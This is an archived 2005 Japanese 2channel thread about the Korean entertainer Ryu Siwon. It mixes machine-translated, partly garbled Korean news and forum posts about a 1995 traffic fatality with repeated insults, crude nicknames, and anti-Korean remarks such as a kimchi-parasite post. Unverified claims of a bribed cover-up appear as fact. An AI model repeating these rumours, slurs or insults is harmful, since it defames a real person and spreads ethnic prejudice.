2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ひまわり】リュ・シウォン【RHAPSODY】

1 :魅せられた名無しさん:2005/05/20(金) 01:37:01
タイトルには目をつぶって。

2 :魅せられた名無しさん:2005/05/20(金) 01:50:15
>>1
( ーωー)ギュ


3 :魅せられた名無しさん:2005/05/20(金) 20:54:12
あひゃ

4 :魅せられた名無しさん:2005/05/20(金) 20:59:37
腐ってもC様

5 :魅せられた名無しさん:2005/05/20(金) 21:42:23
5サンウ

6 :魅せられた名無しさん:2005/05/21(土) 00:28:59
前の歌は嫌いじゃなかった

7 :魅せられた名無しさん:2005/05/21(土) 00:41:32
おいしいよ〜

8 :魅せられた名無しさん:2005/05/21(土) 07:35:53
世界日報の過去記事データベースより (韓国語)
http://www.segye.com/Service5/ShellView.asp?TreeID=1510&PCode=0007&DataID=199502070000000001
タレント リュ・シウォンに令状/タクシーを拾おうとした通行人を轢殺

ソウル江南警察では6日タレント リュ・シウォン氏(22・ソウル瑞草区盤浦洞)に対して
交通事故処理特例法違反疑いで逮捕状を申し込んだ.

柳氏は去る4日0時10分頃ソウル江南区地下鉄3号線新沙駅前の道でルマン乗用車を
駆って行き、タクシーを拾おうとうろついていたチャン某さん(49)を轢いて5日夜死ぬように
した疑いを受けている.
<ハムヤンフン記者>

9 :魅せられた名無しさん:2005/05/21(土) 07:36:18
中央日報の過去記事データベースより (韓国語)
http://find.joins.com/joinsdb_content_prv.asp?id=DY01199502060203
タレント ユ・シウォンに令状 通行人轢いて死ぬようにして
掲載日: 1995年02月06日[23面]字詰め: 308字寄稿者:ピョゼヨング

PDF表示 IPQ表示

ソウル江南警察では6日タクシーを拾うために道路に立っていた行人を打って死ぬようにした疑い
(交通事故処理特例法違反)で有名タレント ユ・シウォン(柳時元.22.ソウル瑞草区盤浦本洞
盤浦アパート)さんに対して逮捕状を申し込んだ.
柳さんは4

10 :魅せられた名無しさん:2005/05/21(土) 07:36:50
東亜日報の過去記事データベースより (韓国語)
http://www.donga.com/fbin/dfsrchview?n=9502070000025451
【タレント「リュ・シウォン」/通行人を轢き死亡させる】
発行日: 1995-02-07
ソウル江南警察の発表によれば、乗用車を運転中に通行人を撥ねて
死亡させたとして、タレント:リュウ・シウォン(24歳)を6日、
交通事故処理特例法違反の疑いで立件し、調査中だ。
警察によればリュウ氏は、去る4日の午前0時10分頃、
ソウル市江南区新沙洞の地下鉄新沙駅付近にて乗用車を運転中に、
タクシーを拾おうとして車道に出ていた張準星さん(49歳・京畿道城南市寿井区山城洞)
を撥ねて、翌日死亡させた疑いだ。

11 :魅せられた名無しさん:2005/05/21(土) 07:38:54
http://news.hanafos.com/einside/view.asp?ArticleNo=1245706&class1=02
ネチズン, "オリコン1位?道徳性から!"
[ディッシュインサイド2005-04-15 09:10]

日本で活動している歌手兼タレントリュシワンが日本私のオリコンチャートで1位を記録したという消息が
伝わると各インターネットコミュニティでは“誇らかだ”という意見劣らず“順位記録が間違ったことではないのか”と
反感を現わすネチズンたちが論争をしている.

報道によればリュシワンのシングルアルバムである‘サクラ’がオリコンチャート1位(4月12日)に上がって
日本人たちの関心がリュシワンに集中照明されている.日本のアルバム市場状況をよく現わしている
オリコンチャートはその日のアルバム販売量を集計したことで,アルバム販売量や歌手の支持度・人気度が
アルバム価格に決まった部分影響をかけるから重要な音楽資料に取り扱いされている.
 (中略)
それに最近大きい罷場を呼び起こしているキムサンヒョク飲酒運転事件と連関して,
‘芸能人が持たなければならない道徳性’に対して問題申し立てるネチズンもいた.

実際にリュシワンは去る1995年2月,運転している途中通行人を轢いてそのまま逃げて
通行人が死ぬ事件が発生してしばらく非難の対象に上がった.

大多数のネチズンたちは“芸能人たちは大衆に露出する職業を持っただけに
実力も重要だが何より道徳性を取り揃えるのが必要だ”というところに同意した.
中には,ネチズン‘キム・フングクの娘たち’は“(リュシワンが)日本でもうちょっと席が
つかまればキムサンヒョクも連れて行ってデュエットで活動しても良い”と捻ったりした.

日本や中国など外国にまで活動範囲を広げて行く芸能人たちが多くなる傾向の中で
ネチズンたちは“我が国の芸能人が海外で認められるということは気持ち良い事だが,
道徳性に疑心を受ける芸能人はむしろ国イメージに助けがならないようだ”と口をそろえて言っている.

12 :魅せられた名無しさん:2005/05/21(土) 10:27:17
ここ?

13 :魅せられた名無しさん:2005/05/21(土) 10:57:50
ttp://kuyou.exblog.jp/i0
リュ・シウォン:日の丸を燃やしているビデオありました!
(中略)
日の丸燃やした収益で、北朝鮮に義捐金を送るって、あのねえ…。
それにしてもこれはリュシウォンが日の丸を燃やすビデオを作ったのは一度や二度では無いと言う事に。
本当に良い度胸してるな。
ブルボン、本気でCMに出すつもりだろうか。
ttp://user.chollian.net/~tgsoon/mv/happy.wmv
↑消されタ━━(━(━(-( ( (゚∀゚) ) )-)━)━) ━━ !!!!!
でもうpシタ━━━ヽ(∀゚ )人(゚∀゚)人( ゚∀)人(∀゚ )人(゚∀゚)人( ゚∀)ノ━━━ !!!
ttp://fuckin.minidns.net/~so_what/cgi-bin/upup2/source3/No_0150.zip
これが今回見つかったビデオ。
うーむ。ばっちり燃えてるね。
それにしても朝鮮戦争を題材にしているように思うんだけど、何で日の丸焼いてるの?
朝鮮戦争に日本は関係無いじゃない。
もしかして北朝鮮と戦っていたんだということが分かっていない?

動画どうぞ。(happy.wmvと同じ物)
ttp://www.dela-grante.net/michelin/up/so/No_2933.wmv

14 :魅せられた名無しさん:2005/05/21(土) 10:59:04
殺人鬼・リュ・シヲン

15 :魅せられた名無しさん:2005/05/21(土) 11:02:26
超角刈り
http://kankokuhiroimono.seesaa.net/ryusion-gakusei/heesun1010_105.jpg
角刈り時代
http://bingoimage.naver.com/data3/bingo_27/imgbingo_14/limitless_1/15339/limitless_1_4.jpg
皺男
http://image.blog.livedoor.jp/yoshiek/05a2c37e.jpg
http://cineplex.cocolog-nifty.com/main/entry_hza/01.jpg
振られ役のMV
http://www.showtime.jp/korea/special/img/sp_img_0806.jpg
牙女の皺男のプリクラ
http://i.photo.empas.com/swe0487/swe0487_314/sp/3657/%B7%F9%BD%C3%BF%F8%20%BC%AD%C1%F6%BF%B51.jpg
孫悟空?
http://members.at.infoseek.co.jp/anchil23/heroes/mainicon/rsw.jpg
唇紅過ぎ!
http://www.fila.co.kr/data/starGallery/bImg/2004/46.jpg
ブラ、これからは吹いて見て選択してください
http://kr.img.n2o.yahoo.com/yhi/nbbs/1417/n2o_1417_78638_1?1114631010.jpg
シウォン・パパ リュソンウ氏 アルテ企画会長
http://joins065.joins.com/JoinsInmul/images/84/25384.jpg
ブルボン肛門CM
http://blogfile.nate.com/data/3/chromez/494667.wmv
日の丸燃やしMV(圧縮ファイル)
http://fuckin.minidns.net/~so_what/cgi-bin/upup2/source3/No_0150.zip
日の丸燃やしMV(解凍ファイル)
http://www.dela-grante.net/michelin/up/so/No_2933.wmv
リュ・シウォンの過去
http://kr.img.n2o.yahoo.com/yhi/nbbs/1417/n2o_1417_60613_1?1115169628.jpg
リュ・シウォンの家族(シウォンの将来が見える...)
http://kr.img.n2o.yahoo.com/yhi/nbbs/1412/n2o_1412_55705_1?1115019195.jpg

16 :魅せられた名無しさん:2005/05/21(土) 11:02:50
韓流スター???
http://kr.img.n2o.yahoo.com/yhi/nbbs/1412/n2o_1412_49545_1?1115022097.jpg
ピンクル&シン・スンフン&リュシウォンが一緒にニャンニャンか?
http://kr.img.n2o.yahoo.com/yhi/nbbs/1412/n2o_1412_23508_1?1115133231.jpg
キム・ウォンジュン,リュシウォン,オムジョンファ,ホン・チンギョン,キムスグンの団体写真
http://kr.img.n2o.yahoo.com/yhi/nbbs/1412/n2o_1412_104251_1?1115139533.jpg
リュシワンのしっくりこないポーズ...
http://kr.img.n2o.yahoo.com/yhi/nbbs/1417/n2o_1417_107011_1?1115181282.jpg
女性の胸をチラ見するスケベ肛門
http://photoimg.enjoyjapan.naver.com/view/47/43/enjoyjapan_4/125000/124456.jpg

17 :魅せられた名無しさん:2005/05/21(土) 11:08:34
反日家で、盗作家で、人身死亡事故を起こしても趣味がカーレースで、
なぜかナルシストで、ヤンバン出身を売りにするリュ・シウォンを語ろう。

リュ・シウォン 画像&Profile
http://plaza.rakuten.co.jp/saurabi/diary/200503310000/
★日の丸燃やしの反日俳優クォンサンウ&リュシウォン
http://blog.goo.ne.jp/pandiani/e/58c1a74ca5a895b3fcbb4f0a57a9a7ad
★韓国スター出演の日の丸燃しビデオ その中身に迫る
http://blog.goo.ne.jp/pandiani/e/a731ef455bb84364438267e7a918e0a0

○過去スレ
【秘密】リュ・シウォン【真実】
http://tv6.2ch.net/test/read.cgi/celebrity/1087442009/
[ prince ] ryu siiwon [volt]
http://tv6.2ch.net/test/read.cgi/celebrity/10
☆prince☆ryu siwonV☆volt☆
http://tv6.2ch.net/test/read.cgi/celebrity/1093935918
[ prince ] ryu siwon 4 [volt]
http://tv6.2ch.net/test/read.cgi/celebrity/1097503979/
[ prince ] ryu siwon 5 [volt]
http://tv6.2ch.net/test/read.cgi/celebrity/1102679050/
[ 永遠の ] ryu siwon 5 [リャンバン]←実質6
http://tv6.2ch.net/test/read.cgi/celebrity/1103388768/
[ 永遠の ] ryu siwon 6 [リャンバン]←実質7
http://tv6.2ch.net/test/read.cgi/celebrity/1104936206/
永遠のプリンス リュ・シウォン←実質8
http://tv6.2ch.net/test/read.cgi/celebrity/1104770408/
[ 肥満児顔 ] ryu siwon 9 [(*)肛門顔(*)]
http://tv6.2ch.net/test/read.cgi/celebrity/1109965434/
【日の丸燃やし】 ryu siwon 10 【(*)肛門顔(*)】
http://tv6.2ch.net/test/read.cgi/celebrity/1112346308/

18 :魅せられた名無しさん:2005/05/21(土) 11:20:09
ttp://messages.yahoo.co.jp/bbs?.mm=GN&action=m&board=552021152&tid=a5ja5ea1a6a57a5a6a5a9a5sa45a4sbg9a5a4ada1aa&sid=552021152&mid=3456
事故一回だけではない
2005/ 3/28 15:18
メッセージ: 3456 / 3467

投稿者: xxxxxxxxxx (25歳/女性)
すみません、如何してもこの韓流スターを好きなれません。
よく調べて下さい、事故は一回だけではなく、一回目は死に至らなかったが反省もしないのまま、
相変わらずスピード出し過ぎで結局人をまた引いてしまって死なせる訳でした。
日本向きの優しい感じファン魅了してるようですが、實は派手好き、商売好き、
お喋り好き、社交家でスキャンダル芸能人として韓国では有名らしいです。

19 :魅せられた名無しさん:2005/05/21(土) 11:21:07
Episode 2.★リュシワンが監獄行かなかった理由...
……そしてリュシワンの兄さんは私ども学校,江南のSM選ぶナワッグなの.
リュシワンの兄さんは高等学校時勉強をよほどよくしたと言います.
リュシワンの兄さんは学卒後
警察大学か....行政考試か..(行政考試が当たるでしょう)
準備をならなかったです.
そうした渦中芸能人をちょうど始めた弟が
交通事故を..それもひき逃げを打ったと言います.
弟(妹)が芸能生活を始めてもうちょうど名前がちょっと知られようと思う時のに
そんな事にあうようになると,
行政考試準備ではどんな助けも与えることができなかった兄さんは自分の希望などすべてのものをあきらめて
司法考試(or単純ボブゴングブ)をしたと言います.
それからは然然で弟を抜き取ることイッオッダドグンなの..
言い換えればリュシワン..ひき逃げ当たります.
そしていくら兄さん(型)の努力があったしても..
ひき逃げ交通事故があまり簡単に解決されることができましょうか...?
そうですね...お爺さんが長官出身ならば政界方へすごい竝びがあるはずだが...
軍隊も送らない世の中にこのようなの下やドブオふたつ数オブオッウルカなの...?
下の文見たらギザドルハンテもお金着せて記事ミョッズル使ってマルアッダドンデ

20 :魅せられた名無しさん:2005/05/21(土) 11:24:19
リュ・シヲン痛すぎ

21 :魅せられた名無しさん:2005/05/21(土) 11:40:48


★ 韓国産キムチの虫が頭に・・・


神奈川県在住、21歳女性。焼き肉が好きでよく食べるが、生肉は食べない。

キムチが好きで、韓国産のキムチ漬けを購入し常食していた。

1ヶ月前から感冒様症状があり、左上肢のしびれと右上肢の筋力低下を感じ来院。

頭部CTスキャンでは脳内に計1〜2cmの腫瘤陰影が、血液検査では好酸球の増多が認められた。

このため、寄生虫症を疑って抗体検査を行ったところ有鉤条虫に対する反応が陽性であった。

寄生虫ミニ事典より
http://jomf.health.co.jp/report/kaigai/19/worm/b/b2/b2-2.htm

ゴミ餃子にも驚いたけど

韓国に衛生管理と言う言葉があるのでしょうか?



22 :魅せられた名無さん:2005/05/21(土) 11:56:39
女性自身の表紙の顔も追加してくらさい。

23 :魅せられた名無しさん:2005/05/21(土) 13:21:27
シウォンの前科って、パンストかぶって銀行強盗したって事?






24 :魅せられた名無しさん:2005/05/21(土) 17:08:12
今週の週刊女性の表紙があり得ない件について。
http://news19.2ch.net/test/read.cgi/news/1116650852/l50

25 :魅せられた名無しさん:2005/05/21(土) 17:09:08
週刊女性の表紙

http://www.kobunsha.com/CGI/magazine/hyoji.cgi?sw=index&id=001

26 :魅せられた名無さん:2005/05/21(土) 17:42:58
>>24見てきた。
ヲタにも不評ってのがワロタ。


27 :魅せられた名無しさん:2005/05/21(土) 21:35:38
超角刈り
http://kankokuhiroimono.seesaa.net/ryusion-gakusei/heesun1010_105.jpg
角刈り時代
http://bingoimage.naver.com/data3/bingo_27/imgbingo_14/limitless_1/15339/limitless_1_4.jpg
皺男
http://image.blog.livedoor.jp/yoshiek/05a2c37e.jpg
http://cineplex.cocolog-nifty.com/main/entry_hza/01.jpg
振られ役のMV
http://www.showtime.jp/korea/special/img/sp_img_0806.jpg
牙女の皺男のプリクラ
http://i.photo.empas.com/swe0487/swe0487_314/sp/3657/%B7%F9%BD%C3%BF%F8%20%BC%AD%C1%F6%BF%B51.jpg
孫悟空?
http://members.at.infoseek.co.jp/anchil23/heroes/mainicon/rsw.jpg
唇紅過ぎ!
http://www.fila.co.kr/data/starGallery/bImg/2004/46.jpg
ブラ、これからは吹いて見て選択してください
http://kr.img.n2o.yahoo.com/yhi/nbbs/1417/n2o_1417_78638_1?1114631010.jpg
シウォン・パパ リュソンウ氏 アルテ企画会長
http://joins065.joins.com/JoinsInmul/images/84/25384.jpg
ブルボン肛門CM
http://blogfile.nate.com/data/3/chromez/494667.wmv
日の丸燃やしMV(圧縮ファイル)
http://fuckin.minidns.net/~so_what/cgi-bin/upup2/source3/No_0150.zip
日の丸燃やしMV(解凍ファイル)
http://www.dela-grante.net/michelin/up/so/No_2933.wmv
リュ・シウォンの過去
http://kr.img.n2o.yahoo.com/yhi/nbbs/1417/n2o_1417_60613_1?1115169628.jpg
リュ・シウォンの家族(シウォンの将来が見える...)
http://kr.img.n2o.yahoo.com/yhi/nbbs/1412/n2o_1412_55705_1?1115019195.jpg


28 :魅せられた名無しさん:2005/05/22(日) 10:37:46
じゃ、秋になったら「秋桜」とかいう曲出すのか。

29 :魅せられた名無しさん:2005/05/22(日) 12:02:43
晩秋には「菊」を歌って、MVで自慢の「菊門」を披露します。

30 :魅せられた名無しさん:2005/05/22(日) 14:00:56
こいつ、聞きしにまさる不細工だね。何、あの表紙の写真。
キモイ不細工おかま。あれで整形済みって、ありえない。
もっと気合入れて整形しろ!!

31 :魅せられた名無しさん:2005/05/22(日) 20:19:18
>>29
それはそれで別方面から新規のファンを開拓しそうだが...?
あ、そういやピー○ーもシウォンのファンだった!

32 :魅せられた名無しさん:2005/05/22(日) 20:26:57
正規のファンはみんなあっちに移動してるよ。

33 :魅せられた名無しさん:2005/05/22(日) 20:31:03
整形してないでしょ

34 :魅せられた名無しさん:2005/05/22(日) 21:25:32
これで整形だと不幸すぎる

35 :魅せられた名無さん:2005/05/23(月) 00:43:38
>>29>>31
別方面のこと薔薇族とか言わない?
今ちょうど薔薇の季節だから、「薔薇」を緊急発売すればいい。

36 :魅せられた名無しさん:2005/05/23(月) 13:38:16
題目:[ファーム]リュシワン人おゆ人跡あった!!!
オルリンが:wildhan (ハンドックフィ) 02/02/02 22:52読み:1690推薦:100関連資料あり(TL)

-----------------------------------------------------------------------------
ホゴゴック...私はどうして分からなかったんでしょうか...
リュシワンこんな事がありましたよね.
こんなに寒い冬,テレビショーを見ています.
リュシワンが進行する"ナウ"というプログラム,私はそのまま平凡な学生です.たまに変な概念を抱いたりするが.

少なくとも私の考えが正当だったら推し進めようとする堂々な大韓の青年です.
必要ない言葉抜いて,言うことをします.
私は私的な私の感情で誰を嫉むとかすること一番汚らしくて汚い仕業だから思います.

しかし今ショーを進行しながら笑いながら話すリュシワンを見ればまことに気持ちが汚くなります.

私たちは時間が経てば忘れないとすべきこともあまりにも易しく忘れるようです.特にス,シン・ドンヨプ,イ・スンヨン等々.

1995年初冬の事件が思い出します.リュシワンの車に轢かれて道路で放置されたままサヌル
一死骸になって空に行ってしまった事件, あの時もその事件はあまりも新聞にやや小く出ましたよ,
リュシワンのコネがいくら良い増えたからは分からなくても.すぐリュシワンひき逃げ事件です.私がいなかった話すんだって?
それは調べれば良いです
もしその死んだ人のご両親や兄弟が今TVで笑っているリュシワンを見ている面気持ちがどうかな
敷布団?公認が何でしょうか?自分の過ちに対しては深くヌィウにして会計をしなければならないとボブ
お前だ.少なくともイ・スンヨンも殆ど一年近く放送活動を折って反省をしたのかしなかったかは分からないが....
今TVで誇りますね,自分が好きだった女は今まで4人だったと,
自分は誰かが本当に愛する人をおゆのボムジェザランゴッも知らないふり考えなしにマルハそのそうしないします.
初めから放送であんな破廉恥犯罪人が二度と出演夏至アンアッウムします.
いくら放送界が汚なくて汚くても.人を殺してひき逃げをした人間を私たちの育つ青少年たちの偶像になってはいけないから
こんな必要ない文を書きます.


37 :魅せられた名無しさん:2005/05/23(月) 13:39:45
日 : なんでリュ・シオンが一位なのか理解できない…
http://bbs.enjoykorea.naver.co.jp/jaction/read.php?id=enjoyjapan_28&nid=41389&work=list&st=&sw=&cp=1

韓 - 韓国人はもっと理解することができないかも知れない. w
韓 - リュ・シオンオリコンデイリー1位は本当に衝撃w
韓 - リュ・シオンはごみであるがベ・ヨンジュンは立派な人です.
韓 - 私もリュ・シオンが 1位をしたと思った瞬間驚愕したどうしてリュ・シオンだだと.
韓 - リュ・シオンごみ -_- 殺人魔,, 日本人たちリュ・シオン好むことを止めてください,, 韓国の数値です.

あははははははははははは
     ∧_∧ ミ ギャーッハッハッハッ!
 o/⌒(. ;´∀`)つ
  と_)__つノ  ☆ バンバン
日 : なんでリュ・シオンが一位なのか理解できない…
http://bbs.enjoykorea.naver.co.jp/jaction/read.php?id=enjoyjapan_28&nid=41389&work=list&st=&sw=&cp=1

韓 - 韓国人はもっと理解することができないかも知れない. w
韓 - リュ・シオンオリコンデイリー1位は本当に衝撃w
韓 - リュ・シオンはごみであるがベ・ヨンジュンは立派な人です.
韓 - 私もリュ・シオンが 1位をしたと思った瞬間驚愕したどうしてリュ・シオンだだと.
韓 - リュ・シオンごみ -_- 殺人魔,, 日本人たちリュ・シオン好むことを止めてください,, 韓国の数値です.


38 :魅せられた名無しさん:2005/05/23(月) 13:40:24
韓 : 日本おばさんたちが見るリュ・シオンの魅力はこのようなものですか?

1. 貴族家の子孫

2. 34歳とは信じられない小僧の顔

3. 殺人経歴のカリスマ

4. 韓国で一人ぼっち

リュ・シオンの魅力をもっとお知らせ下さい.

韓 - 笑う時ドルオナは 100列のシワ (04/14 14:30)

日 - punの母親はkimoiって言ってたよ (04/14 14:31)

韓 - 自分が格好よくて, ザルナンズル分かる純純さ?
<< 完全韓国ではこのようなの一番嫌やがり (04/14 14:31)

日 - 小母さんは韓国人が好き。丁度言いのだろう。
気を使わないで済むのだろう (04/14 14:32)

日 - 一部fanによる大量購入

日 - ジャニーズやモーニング娘もそう。一人で10枚20枚と
購入するfanが多い。1位にさせるために。 (04/14 14:35)

韓 - どうせ 1位させるために大量購買することもファンが多ければ
可能なのだろう.


39 :魅せられた名無しさん:2005/05/23(月) 13:41:07
日 - RainやSevenの方がずっと好きだが、リュ・シウォンが韓国で、
そんなに酷い歌手だとはしらなかった。

韓 - 韓国ではあまり人気はないです..リュ・シオンのした行動が多くて..
良くないように見る人々もいます...どうしてオリコン 1位か
理解出来ないです...smapは何をするゴッイルが??休息するか?..理解不可!
おばさんたちに力?power?

韓 - リュ・シオンはもうドラマキャスティングもならない水準だったが..
日本おばさんたちがまたいかしてくれるふるまうか..
あんな音痴はいくら良い歌でも要らないんじゃないの..

韓 - リュ・シオンがどうしてオリコン 1位なのか............
ドラマも出る事ができないのに...日本人たち気が気でない..


40 :魅せられた名無しさん:2005/05/23(月) 13:41:30
日 : 柳時元が韓国では人気ないようですね?

色々な掲示板を見ると柳時元は韓国では嫌われてるようです。(Ψ▽Ψ*)♪
本当ですか?(゜∇゜ ;)エッ!?

韓 - 憎まれている..

韓 - 韓国で憎まれているスターたちがどうして日本で浮かぶことか疑問..

日 - 憎まれてる理由は何ですか?

韓 - ひき逃げとつがいのごきぶりだったガールフレンドのためなの

韓 - 人間性に対する問題のためであるでしょう.


41 :魅せられた名無しさん:2005/05/23(月) 13:41:56
日 - 殺人犯ですか?恋人も評判悪かったの?

韓 - そう.. 殺人犯.. そして恋人は一番憎まれている女芸能人ではない
かたくて

韓 - 君の彼だと言うひき逃げの前恋人..k さっぱり理解することが
できないこの人のデイリー 1位取得は韓国人も喜ばないようですね

日 - 日本に避難しに来たのかな? ドラマ「秘密」の時の柳時元は
好きだったけど、最近は...。ちょっと失礼かもしれませんが、
歌が下手です;;


42 :魅せられた名無しさん:2005/05/23(月) 13:42:15
韓 - 歌も間違う人がしきりにアルバムを出すことに..荒唐なだけです.

韓 - リュ・シオン好きにしないでください.
かえって舶用下嫁ずっとましではないか?

韓 - うん.. 下手だ.. 舶用下嫁ずっとよく呼ぶ

韓 - リュ・シオンは趣味で放送生活をする 3類タルレントです.
演技に対する悩みがないので発展もないです. .. 演技力が今年 30が
過ぎたがまだハイティーンスター水準です. どうしてそうなのかしたら..
家が金持ちですね.. 金持ちだから. ナテヘッドンゴだ.

韓 - ガールフレンドが有名なグループアイドルだったが..
同じグループの女メンバー (お姉さん)に縁起でもないという
原色的な悪口をよくしたんです. ある日感情が一瞬にして爆発して
しまったその女メンバー(お姉さん)と大阪モムサウムジルをしたが...
それが言論にそのまま公開になりました


43 :魅せられた名無しさん:2005/05/23(月) 13:42:41
- リュ・シオンのガールフレンドがお母さんまで呼んで来て.
同じ女メンバーの髪の毛を取って身を売る女だから悪口を言いながら
一緒に馬具争ったと言います. それが言論にそのまま公開がなってしまって
一瞬にして彼女は ( リュ・シオンのガールフレンド) 社会で売場に
なってしまいました

韓 - リュ・シオンを嫌やがることはこれのためだけではないです.
延期がかんのむしがおこります. それに引き受ける役割が常に似ています.
発展も変化もないです. ヘアスタイルが 10年目グデロブニだ.

韓 - 人間性もリュ・シオンより舶用下嫁ずっとましです.


44 :魅せられた名無しさん:2005/05/23(月) 13:46:08
: リュ・シウォン(柳時元)は 韓国では人気がない、と言うより
嫌われている、とも聞きました。どうしてですか?? 

韓 - ショープログラムでこいつ言いぐさが気に入らない倨慢,利いた風,
ヌキドラマでは阿洲~~善良な振りをしながら

日 - 嫌われてるのは人殺しだから。人をひき殺して逃げた。
その後金で揉み消し。

韓- ひき逃げだけでなく付き合ったガールフレンド(歌手)が
チーム仲間を暴行社は事件が発生して恋人だったリュ・シオンが
一緒に被害を受けたことであって今は別れたが

韓 - 私の考えにもひき逃げで人を殺したという話のためのようだ.
それにもかかわらずレーシングを楽しむとは...

肛門は韓国でもここまで嫌われてるんだね。救われないね。


45 :魅せられた名無しさん:2005/05/23(月) 14:27:39
だからイ・ドンゴンのファンになっときゃよかったのにさ

46 :魅せられた名無しさん:2005/05/23(月) 17:18:20
集中砲火を覚悟の上で
”でも、CDの応募券で、大阪〜東京とファンに感謝のイベントをやってくれて
赤プリのDSも食事&お土産も良かったし、1700人と握手した感謝パーティも、無料
だったし、FCも、頑張ってる シウォンが 大好きです。”
週刊誌はひどかったけど。

47 :魅せられた名無しさん:2005/05/23(月) 17:36:24
瘤・死怨

48 :魅せられた名無しさん:2005/05/23(月) 22:20:01
>>46
> 週刊誌はひどかったけど。

この一言だけは納得した!

49 :魅せられた名無しさん:2005/05/23(月) 22:51:37
PVのあの合成は何ですか?ww
肝いです

50 :魅せられた名無しさん:2005/05/23(月) 22:55:33
ひき逃げ?あの・・それって事実なんですか?

51 :魅せられた名無しさん:2005/05/23(月) 23:01:49
>>50
何をいまさら...
>>8-11の韓国語をコピペして、下記の翻訳サイトで和訳してみてくれ。
もちろん>>8-10は韓国の大手の新聞社の過去記事ログ。
http://www.excite.co.jp/world/korean/

52 :魅せられた名無しさん:2005/05/24(火) 00:32:21
マンドクサ

53 :魅せられた名無しさん:2005/05/24(火) 02:18:27
>>52
だったら訳してあるのを信じろよ。

オマイ、前々スレでも同じ事言っていなかったか?

54 :魅せられた名無しさん:2005/05/24(火) 09:13:13
あの合成ワラタ
顔のドアップ時間長杉
マニア以外吐いてしまうよ

55 :魅せられた名無しさん:2005/05/24(火) 10:51:57
siwonのイベントってとってもいいよ! 14日の「桜」のイベント無料!!12月の丸ビルのショーケースも無料!!                                                         

「おいしい誘惑」の握手会も買った人全員!! ソウルのレースの応援も弁当付き、バス代込み、無料!! さすが 大金持ち!!      

56 :sage:2005/05/24(火) 11:53:04
↑ 無料のイベントは当たらない。
レースの観戦はスポンサーが出しているのであって、シウォンが
金持ちだからとか関係ない。

57 :魅せられた名無しさん:2005/05/24(火) 12:43:33
>>56
その通り。

58 :魅せられた名無しさん:2005/05/24(火) 17:02:42
昔あのひき逃げ

まるでなかった事の様に

忘れないよ 肛門顔 自動車事故

59 :魅せられた名無しさん:2005/05/24(火) 17:09:12
他のぼったくりに比べればましだと思うよ。

60 :☆みゅう様(*^-^*)☆ ◆MYU8XBoDOM :2005/05/24(火) 17:24:40
こんなウンコまだ追っかけてるってちょっとおまえらやばいんとちゃうか


61 :魅せられた名無しさん:2005/05/24(火) 17:26:13
55さん、イベントの話し詳しく知りたいです!

62 :さあ みんなで歌いましょう:2005/05/24(火) 23:25:31
昔あのひき逃げ〜♪

まるでなかった事の様に〜♪

忘れないよ〜 肛門顔 自動車事故〜♪

63 :魅せられた名無しさん:2005/05/25(水) 03:49:29
ぼったくりサンウに比べれば肛門の方がリーズナブルだな

64 :魅せられた名無しさん:2005/05/25(水) 04:14:28
金取れるほど人気がないから...

大部分はサクラ〜サクラ〜♪

65 :魅せられた名無しさん:2005/05/25(水) 04:17:57
「オカマ」にくっ付くのは「オコゲ」
「オナベ」にくっ付くのは「オスス」
「肛門」にくっ付くのは「ウ○コ」

66 :魅せられた名無しさん:2005/05/25(水) 04:23:35
DSもボッタクリでは?w
肛門よりサンウの方がカッコイイしリーズナブル

67 :魅せられた名無しさん:2005/05/25(水) 09:54:47
サンウも酷いだろ
何あの太り方
ブーちゃんはブーちゃんなりに体重をキープしてるから
それにブーちゃんは途中で歌を中断しないよ
音痴だけど「今日風邪ひているスミダ」
なんて逃げないですから。

68 :魅せられた名無しさん:2005/05/25(水) 11:01:28
siwon ぼったくりじじゃないよ。 だって、無料のイベント 多いもん。空港だって必ず
羽田使うし、裏から帰国するビヨンホンとかより サービス満点!! 写真もいくら撮影
怒らないし。 kprで物買うと生写真プレゼント、ソファーに座ってDVD見放題。歌もうまくな
って、やせて素敵になって、昔、韓国で干されたから、今、すごく、ファン思い。1度、落ち
目になった、芸能人のほうが、優しいよ。 今まで、芸能人なんて、興味なかった。

69 :魅せられた名無しさん:2005/05/25(水) 11:55:39
ぼったくりとかって、シウォンも含めタレント自身は
値段設定には関与してないんじゃないの?



70 :魅せられた名無しさん:2005/05/25(水) 15:27:24
プリンス

71 :魅せられた名無しさん:2005/05/25(水) 16:39:26
というか、シウォンの周りは 比較的 頭のいい人間がいるような気がする。
地域密着型かな 地方ドサ目立たないけど堅実型(ヨンハ)
取れる時に集金型(サンウ) プライド高いけどカンヌで恥欠く型(イ)
本当にいいから日本に無理してこない型(ウォンビン・ドンゴン)
ドサクサ紛れ型(テヒョン)  リュのパパは日本語が話せるらしいから
欠点を カバーしているんじゃない。

72 :魅せられた名無しさん:2005/05/25(水) 18:01:12
日本所属事務所は最高にバカだけどな

73 :魅せられた名無しさん:2005/05/25(水) 18:35:58
ひまわりのラブソディ 予約開始です。

74 :魅せられた名無さん:2005/05/25(水) 18:48:30
ヲタが戻ってきたの?

75 :魅せられた名無しさん:2005/05/26(木) 02:25:38
>>68
つーか肛門は祖国で人気ないしビョンと比べられてもレベルが違うw
68の方は句読点が多すぎたり日本語が不自由ですが、どこの国の方ですか?w

76 :魅せられた名無しさん:2005/05/26(木) 03:59:37
人気あるの?かっこいいと思ったことない。



77 :魅せられた名無しさん:2005/05/26(木) 15:21:23
今 人気あるよ。 一部にだけど。 68は 日本人だよ。 2chだから確認しないでそのまま送信しただけ。
見慣れるとかっこいいよ。 ビンとかヨンあたりは最初からハンサムだとおもった。
でも 飽きるんだよね。 ビヨンは原田泰造だし。 ドンは顔濃いし。 日本のツマンナイドラマよりましかな。
アンチsiwonに書き込みするのも面白い。 好きですsiwonクーンばかりだから。
いろいろ貼り付けご苦労様でーす。 

78 :魅せられた名無しさん:2005/05/26(木) 16:29:46
>ビヨンは原田泰造だし。 ドンは顔濃いし。

へーーー。しうおんは、しもだ過激だし。

79 :魅せられた名無しさん:2005/05/26(木) 18:53:21
>>77
おまいが68本人だろ。
ヨの小文字の入力方法ぐらい勉強しなよ。それに日本語だとそんなにスペース入れなくて良いんだよ。

なるほどね。飽きない顔ね。まるでピカソの絵みたいに歪んでいるし...
どんな方法で皺取りしているのかはわからんが、あのブルボンのCM撮影光景でさえ
笑うといきなり皺皺だったね。

80 :魅せられた名無しさん:2005/05/27(金) 00:35:49

みんな詳しいけどシウオンのスケジュール教えて。 長崎いつ行くの。会いたいなー。
芸能界の方ですか。 

81 :魅せられた名無しさん:2005/05/27(金) 00:37:38
